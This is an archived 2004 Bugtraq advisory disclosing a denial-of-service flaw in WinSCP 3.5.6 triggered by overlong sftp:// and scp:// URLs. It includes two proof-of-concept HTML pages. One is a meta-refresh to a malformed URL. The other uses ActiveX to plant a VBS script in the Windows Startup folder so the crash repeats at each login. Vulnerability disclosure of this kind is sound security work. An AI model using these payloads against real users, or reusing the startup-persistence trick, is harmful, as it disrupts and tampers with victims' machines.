lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 15 Apr 2004 06:17:04 -0000
From: Luca Ercoli <luca.e@...web.com>
To: bugtraq@...urityfocus.com
Subject: WinSCP Denial of Service




Package:       WinSCP
Auth:          http://winscp.sourceforge.net
Version(s):    3.5.6 (maybe also prior versions are vulnerable)
Vulnerability: Denial of Service




What’s WinSCP:

“WinSCP is an open source SFTP (SSH File Transfer Protocol) and
SCP (Secure CoPy) client for Windows using SSH (Secure SHell).
Its main function is safe copying of files between a local and
a remote computer.” 



Vulnerability Description:

A default installation of WinSCP provide the user with 
functionality to handle sftp:// and scp:// addresses. 
The vulnerability exists due to the way the application 
handles long URL’s. A malformed scp:// or sftp:// address 
embedded in a HTML tag cause the WinSCP application to 
exhaust CPU and Memory resources.
The attacker would need the ability to convince the user
to visiting a web site he controlled or opening an HTML 
e-mail he had prepared. During the denial of service, 
WinSCP will not display any GUI.



Goal:

An attacker may use this flaw to prevent the users of attacked
host from working properly.



Pratical Examples:

------ WinSCP_DoS1.html  --------

<HTML>
<HEAD>
<TITLE>WinSCP DoS</TITLE>

<meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">

</HEAD>
<BODY>
</BODY>
</HTML>

----------------------------------


-------- WinSCP_DoS2.html  -------

<html>
  <head>
  <title>WinSCP DoS</title>
   
    &lt;script language="JScript">

     var WshShell = new ActiveXObject("WScript.Shell");
     strSU = WshShell.SpecialFolders("StartUp");
 
     var fso = new ActiveXObject("Scripting.FileSystemObject");
     var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);
      
     vibas.WriteLine("Dim shell");
     vibas.WriteLine("Dim quote");
     vibas.WriteLine("Dim DoS");
     vibas.WriteLine("Dim param");
     vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");
     vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");
     vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")");
     vibas.WriteLine("quote = Chr(34)");
     vibas.WriteLine("pgm = \"explorer\"");
     vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");
	 
     vibas.Close();
     
    &lt;/script&gt;

  </head>
</html>

----------------------------------






Credits:
-- 

Luca Ercoli	<luca.e [at] seeweb.com>
Seeweb		http://www.seeweb.com


Powered by blists - more mailing lists